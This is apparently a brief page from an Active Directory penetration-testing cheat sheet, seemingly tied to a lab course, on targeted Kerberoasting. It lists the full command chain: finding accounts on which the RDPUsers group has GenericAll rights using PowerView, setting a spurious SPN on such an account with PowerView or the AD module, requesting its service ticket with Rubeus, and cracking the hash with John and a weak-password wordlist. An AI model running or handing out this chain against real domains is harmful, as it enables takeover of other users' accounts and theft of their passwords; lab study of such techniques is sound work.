Set-SPN
With enough rights (generic all/ generic write) a target user's SPN can be set to anything(unique in the domain) then a service ticket can be requested for kerberoasting and getting the account access. How to do it? For exmaple we check outbound rules from bloodhound or run the below powerview command for the RDPUsers group we will see there are some supportx users on domain where rdpusers group has generic all permissions.
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}Using Powerview, see if the supportuser already has a SPN:
Get-DomainUser -Identity supportuser | select serviceprincipalnameSame using AD module
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalNameNow set SPN for that user
Set-DomainObject -Identity support1user -Set @{serviceprincipalname=‘dcorp/whatever1'}Same as above set SPN using AD moudle
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add=‘dcorp/whatever1'} After this kerberoast the user
Rubeus.exe kerberoast /outfile:targetedhashes.txt
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\targetedhashes.txtLast updated